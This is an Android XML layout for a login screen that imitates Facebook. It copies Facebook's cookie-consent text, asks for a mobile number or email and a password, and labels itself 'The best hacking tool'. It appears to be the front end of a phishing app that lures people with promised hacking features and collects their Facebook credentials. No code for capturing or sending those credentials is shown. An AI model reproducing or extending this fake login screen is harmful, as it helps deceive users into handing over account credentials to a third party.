<LinearLayout
	xmlns:android="http://schemas.android.com/apk/res/android"
	xmlns:app="http://schemas.android.com/apk/res-auto"
	xmlns:tools="http://schemas.android.com/tools"
	android:layout_width="match_parent"
	android:layout_height="match_parent"
	android:orientation="vertical">
	<LinearLayout
		android:id="@+id/linear3"
		android:layout_width="match_parent"
		android:layout_height="wrap_content"
		android:orientation="horizontal">
		<ImageView
			android:id="@+id/imageview1"
			android:layout_width="match_parent"
			android:layout_height="100dp"
			android:src="@drawable/gaa"
			android:scaleType="centerCrop"/>
	</LinearLayout>
	<LinearLayout
		android:id="@+id/linear2"
		android:layout_width="match_parent"
		android:layout_height="wrap_content"
		android:orientation="horizontal">
		<TextView
			android:id="@+id/textview1"
			android:layout_width="wrap_content"
			android:layout_height="wrap_content"
			android:padding="8dp"
			android:text="To personalise content, tailor and measure ads and provide a safer experience, we use cookies. Using the tool, you agree to our use of cookies on and off Facebook."
			android:textSize="12sp"
			android:textColor="#000000"/>
	</LinearLayout>
	<LinearLayout
		android:id="@+id/linear1"
		android:layout_width="match_parent"
		android:layout_height="match_parent"
		android:padding="8dp"
		android:orientation="vertical">
		<TextView
			android:id="@+id/textview3"
			android:layout_width="wrap_content"
			android:layout_height="wrap_content"
			android:padding="8dp"
			android:text="To proceed, login to your account."
			android:textSize="12sp"
			android:textColor="#607D8B"/>
		<LinearLayout
			android:id="@+id/linear4"
			android:layout_width="match_parent"
			android:layout_height="wrap_content"
			android:padding="4dp"
			android:orientation="horizontal">
			<EditText
				android:id="@+id/edittext1"
				android:layout_width="match_parent"
				android:layout_height="wrap_content"
				android:padding="8dp"
				android:background="@android:color/transparent"
				android:textSize="12sp"
				android:textColor="#000000"
				android:hint="Mobile number or Email address"
				android:textColorHint="#607D8B"/>
		</LinearLayout>
		<LinearLayout
			android:id="@+id/linear5"
			android:layout_width="match_parent"
			android:layout_height="wrap_content"
			android:layout_marginTop="2dp"
			android:padding="4dp"
			android:orientation="horizontal">
			<EditText
				android:id="@+id/edittext2"
				android:layout_width="match_parent"
				android:layout_height="wrap_content"
				android:padding="8dp"
				android:background="@android:color/transparent"
				android:textSize="12sp"
				android:textColor="#000000"
				android:hint="Password"
				android:textColorHint="#607D8B"/>
		</LinearLayout>
		<Button
			android:id="@+id/button1"
			android:layout_width="match_parent"
			android:layout_height="35dp"
			android:layout_margin="4dp"
			android:background="#1565C0"
			android:text="Login"
			android:textSize="16sp"
			android:textColor="#FFFFFF"/>
		<LinearLayout
			android:id="@+id/linear6"
			android:layout_width="match_parent"
			android:layout_height="match_parent"
			android:padding="8dp"
			android:orientation="horizontal"
			android:layout_weight="1"/>
		<LinearLayout
			android:id="@+id/linear7"
			android:layout_width="match_parent"
			android:layout_height="wrap_content"
			android:padding="8dp"
			android:orientation="horizontal">
			<TextView
				android:id="@+id/textview2"
				android:layout_width="wrap_content"
				android:layout_height="wrap_content"
				android:padding="8dp"
				android:text="The best hacking tool"
				android:textSize="12sp"
				android:textColor="#607D8B"/>
		</LinearLayout>
	</LinearLayout>
</LinearLayout>
